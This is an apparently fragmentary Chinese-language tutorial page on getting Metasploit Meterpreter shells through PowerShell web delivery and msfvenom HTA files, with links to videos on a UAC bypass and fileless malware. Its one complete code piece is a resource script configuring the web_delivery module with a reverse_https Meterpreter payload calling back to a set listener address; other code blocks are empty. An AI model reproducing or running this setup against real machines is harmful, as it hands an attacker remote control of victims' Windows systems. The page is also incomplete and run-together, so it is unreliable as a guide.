教程
参考视频[1] 和 [2]。
其他参考资料
youtube 关键词 metasploit powershell
64位payload
|
|
Web Delivery
用法 msfconsole -r powershell_web_delivery.rc123456789//powershell_web_delivery.rcuse exploit/multi/script/web_deliveryset target 2set SRVPORT 8081set LPORT 443set LHOST 123.123.123.123set PAYLOAD windows/x64/meterpreter/reverse_httpsset ExitOnSession falseexploit -j
msfvenom HTA
生成HTA文件
|
|
服务端配置
|
|
web_delivery问题
浏览器可以下载powershell脚本。
powershell中无法下载,无法连接到服务器。
无文件 malware
60字节 - Powershell 无文件渗透测试实验
http://paper.seebug.org/243/
参考资料
[1] Meterpreter via PowerShell Payload + UAC Bypass on Windows 7
[2] Kali Linux 2.0: How To Control PC With A Powershell - Metasploit
[3] 小众工具 Kalista